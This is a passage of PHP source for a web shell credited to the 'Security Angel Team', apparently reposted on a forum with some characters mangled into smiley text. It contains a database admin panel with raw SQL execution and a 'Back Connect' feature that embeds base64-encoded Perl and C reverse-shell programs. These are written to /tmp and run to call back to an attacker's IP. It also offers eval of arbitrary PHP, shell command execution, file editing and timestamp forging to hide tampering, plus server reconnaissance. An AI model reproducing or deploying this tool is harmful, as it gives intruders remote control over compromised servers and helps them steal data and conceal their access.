p('<table border="0" cellpadding="3" cellspacing="0">');
p('<tr class="head">');
p('<td>Field</td>');
p('<td>Type</td>');
p('<td>Null</td>');
p('<td>Key</td>');
p('<td>Default</td>');
p('<td>Extra</td>');
p('</tr>');
foreach ($rowdb as $row) {
$thisbg = bg();
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
p('<td>'.$row['Field'].'</td>');
p('<td>'.$row['Type'].'</td>');
p('<td>'.$row['Null'].' </td>');
p('<td>'.$row['Key'].' </td>');
p('<td>'.$row['Default'].' </td>');
p('<td>'.$row['Extra'].' </td>');
p('</tr>');
}
tbfoot();
} elseif ($doing == 'insert' || $doing == 'edit') {
$result = q('SHOW COLUMNS FROM '.$tablename);
while ($row = mysql_fetch_array($result)) {
$rowdb[] = $row;
}
$rs = array();
if ($doing == 'insert') {
p('Insert new line in '.$tablename.' table »');
} else {
p('Update record in '.$tablename.' table »');
$where = base64_decode($base64);
$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1"Wink;
$rs = mysql_fetch_array($result);
}
p('<form method="post" action="'.$self.'">');
p($dbform);
makehide('action','sqladmin');
makehide('tablename',$tablename);
p('<table border="0" cellpadding="3" cellspacing="0">');
foreach ($rowdb as $row) {
if ($rs[$row['Field']]) {
$value = htmlspecialchars($rs[$row['Field']]);
} else {
$value = '';
}
$thisbg = bg();
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
p('<td>'.$row['Field'].'
'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
}
if ($doing == 'insert') {
p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
} else {
p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
makehide('base64', $base64);
}
p('</table></form>');
} else {
$querys = @explode(';',$sql_query);
foreach($querys as $num=>$query) {
if ($query) {
p("

Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."

"Wink;
switch(qy($query))
{
case 0:
p('Error : '.mysql_error().'');
break;
case 1:
if (strtolower(substr($query,0,13)) == 'select * from') {
$allowedit = 1;
}
if ($getnumsql) {
$tatol = mysql_num_rows(q($getnumsql));
$multipage = multi($tatol, $pagenum, $page, $tablename);
}
if (!$tablename) {
$sql_line = str_replace(array("\r", "\n", "\t"Wink, array(' ', ' ', ' '), trim(htmlspecialchars($query)));
$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
$tablename = $matches[1][0];
}
$result = q($query);
p($multipage);
p('<table border="0" cellpadding="3" cellspacing="0">');
p('<tr class="head">');
if ($allowedit) p('<td>Action</td>');
$fieldnum = @mysql_num_fields($result);
for($i=0;$i<$fieldnum;$i++){
$name = @mysql_field_name($result, $i);
$type = @mysql_field_type($result, $i);
$len = @mysql_field_len($result, $i);
p("<td nowrap>$name
$type($len)</td>"Wink;
}
p('</tr>');
while($mn = @mysql_fetch_assoc($result)){
$thisbg = bg();
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
$where = $tmp = $b1 = '';
foreach($mn as $key=>$inside){
if ($inside) {
$where .= $tmp.$key."='".addslashes($inside)."'";
$tmp = ' AND ';
}
$b1 .= '<td nowrap>'.html_clean($inside).' </td>';
}
$where = base64_encode($where);
if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</td>');
p($b1);
p('</tr>');
unset($b1);
}
tbfoot();
p($multipage);
break;
case 2:
$ar = mysql_affected_rows();
p('affected rows : '.$ar.'');
break;
}
}
}
}
} else {
$query = q("SHOW TABLE STATUS"Wink;
$table_num = $table_rows = $data_size = 0;
$tabledb = array();
while($table = mysql_fetch_array($query)) {
$data_size = $data_size + $table['Data_length'];
$table_rows = $table_rows + $table['Rows'];
$table['Data_length'] = sizecount($table['Data_length']);
$table_num++;
$tabledb[] = $table;
}
$data_size = sizecount($data_size);
unset($table);
p('<table border="0" cellpadding="0" cellspacing="0">');
p('<form action="'.$self.'" method="POST">');
makehide('action','sqladmin');
p($dbform);
p('<tr class="head">');
p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
p('<td>Name</td>');
p('<td>Rows</td>');
p('<td>Data_length</td>');
p('<td>Create_time</td>');
p('<td>Update_time</td>');
if ($highver) {
p('<td>Engine</td>');
p('<td>Collation</td>');
}
p('</tr>');
foreach ($tabledb as $key => $table) {
$thisbg = bg();
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
p('<td>'.$table['Name'].' [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop ]</td>');
p('<td>'.$table['Rows'].'</td>');
p('<td>'.$table['Data_length'].'</td>');
p('<td>'.$table['Create_time'].'</td>');
p('<td>'.$table['Update_time'].'</td>');
if ($highver) {
p('<td>'.$table['Engine'].'</td>');
p('<td>'.$table['Collation'].'</td>');
}
p('</tr>');
}
p('<tr class='.bg().'>');
p('<td> </td>');
p('<td>Total tables: '.$table_num.'</td>');
p('<td>'.$table_rows.'</td>');
p('<td>'.$data_size.'</td>');
p('<td colspan="'.($highver ? 4 : 2).'"> </td>');
p('</tr>');

p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>"Wink;
makehide('doing','backupmysql');
formfoot();
p("</table>"Wink;
fr($query);
}
}
}
tbfoot();
@mysql_close();
}//end sql backup


elseif ($action == 'backconnect') {
!$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
!$yourport && $yourport = '12345';
$usedb = array('perl'=>'perl','c'=>'c');

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";

if ($start && $yourip && $yourport && $use){
if ($use == 'perl') {
cf('/tmp/angel_bc',$back_connect);
$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &"Wink;
} else {
cf('/tmp/angel_bc.c',$back_connect_c);
$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
@unlink('/tmp/angel_bc.c');
$res = execute("/tmp/angel_bc $yourip $yourport &"Wink;
}
m("Now script try connect to $yourip port $yourport ..."Wink;
}

formhead(array('title'=>'Back Connect'));
makehide('action','backconnect');
p('

');
p('Your IP:');
makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
p('Your Port:');
makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
p('Use:');
makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
p('

');
formfoot();
}//end sql backup

elseif ($action == 'eval') {
$phpcode = trim($phpcode);
if($phpcode){
if (!preg_match('#<\?#si', $phpcode)) {
$phpcode = "<?php\n\n{$phpcode}\n\n?>";
}
eval("?".">$phpcode<?"Wink;
}
formhead(array('title'=>'Eval PHP Code'));
makehide('action','eval');
maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
p('

Get plugins

');
formfooter();
}//end eval

elseif ($action == 'editfile') {
if(file_exists($opfile)) {
$fp=@fopen($opfile,'r');
$contents=@fread($fp, filesize($opfile));
@fclose($fp);
$contents=htmlspecialchars($contents);
}
formhead(array('title'=>'Create / Edit File'));
makehide('action','file');
makehide('dir',$nowpath);
makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
formfooter();
}//end editfile

elseif ($action == 'newtime') {
$opfilemtime = @filemtime($opfile);
//$time = strtotime("$year-$month-$day $hour:$minute:$second"Wink;
$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
formhead(array('title'=>'Clone file was last modified time'));
makehide('action','file');
makehide('dir',$nowpath);
makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
formfooter();
formhead(array('title'=>'Set last modified'));
makehide('action','file');
makehide('dir',$nowpath);
makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
p('

Instead »');
p('year:');
makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
p('month:');
makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
p('day:');
makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
p('hour:');
makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
p('minute:');
makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
p('second:');
makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
p('

');
formfooter();
}//end newtime

elseif ($action == 'shell') {
if (IS_WIN && IS_COM) {
if($program && $parameter) {
$shell= new COM('Shell.Application');
$a = $shell->ShellExecute($program,$parameter);
m('Program run has '.(!$a ? 'success' : 'fail'));
}
!$program && $program = 'c:\windows\system32\cmd.exe';
!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
formhead(array('title'=>'Execute Program'));
makehide('action','shell');
makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
p('

');
makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
p('

');
formfoot();
}
formhead(array('title'=>'Execute Command'));
makehide('action','shell');
if (IS_WIN && IS_COM) {
$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
}
p('

');
makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
p('

');
formfoot();

if ($command) {
p('');
if ($execfunc=='wscript' && IS_WIN && IS_COM) {
$wsh = new COM('WScript.shell');
$exec = $wsh->exec('cmd.exe /c '.$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
$descriptorspec = array(
0 => array('pipe', 'r'),
1 => array('pipe', 'w'),
2 => array('pipe', 'w')
);
$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
if (is_resource($process)) {
fwrite($pipes[0], $command."\r\n"Wink;
fwrite($pipes[0], "exit\r\n"Wink;
fclose($pipes[0]);
while (!feof($pipes[1])) {
echo fgets($pipes[1], 1024);
}
fclose($pipes[1]);
while (!feof($pipes[2])) {
echo fgets($pipes[2], 1024);
}
fclose($pipes[2]);
proc_close($process);
}
} else {
echo(execute($command));
}
p('');
}
}//end shell

elseif ($action == 'phpenv') {
$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
!$dis_func && $dis_func = 'No';
$info = array(
1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
2 => array('Server Domain',$_SERVER['SERVER_NAME']),
3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
4 => array('Server OS',PHP_OS),
5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
8 => array('PHP run mode',strtoupper(php_sapi_name())),
9 => array('The file path',__FILE__),

10 => array('PHP Version',PHP_VERSION),
11 => array('PHPINFO',(IS_PHPINFO ? 'Yes' : 'No')),
12 => array('Safe Mode',getcfg('safe_mode')),
13 => array('Administrator',$adminmail),
14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
15 => array('enable_dl',getcfg('enable_dl')),
16 => array('display_errors',getcfg('display_errors')),
17 => array('register_globals',getcfg('register_globals')),
18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
19 => array('memory_limit',getcfg('memory_limit')),
20 => array('post_max_size',getcfg('post_max_size')),
21 => array('upload_max_filesize',$upsize),
22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
23 => array('disable_functions',$dis_func),
);

if($phpvarname) {
m($phpvarname .' : '.getcfg($phpvarname));
}

formhead(array('title'=>'Server environment'));
makehide('action','phpenv');
makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
formfooter();

$hp = array(0=> 'Server', 1=> 'PHP');
for($a=0;$a<2;$a++) {
p(''.$hp[$a].' »');
p('
 • ');

 • if ($a==0) {

 • for($i=1;$i<=9;$i++) {

 • p('
 • '.$info[$i][0].':'.$info[$i][1].'
 • ');

 • }

 • } elseif ($a == 1) {

 • for($i=10;$i<=23;$i++) {

 • p('
 • '.$info[$i][0].':'.$info[$i][1].'
 • ');

 • }

 • }

 • p('
');
}
}//end phpenv

else {
m('Undefined Action');
}

?>
</td></tr></table>
<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
<?php debuginfo();ob_end_flush();?>
Copyright (C) 2004-2008 Security Angel Team [S4T] All Rights Reserved.
Sva vremena su GMT +2. Trenutno vreme je 11:21 am.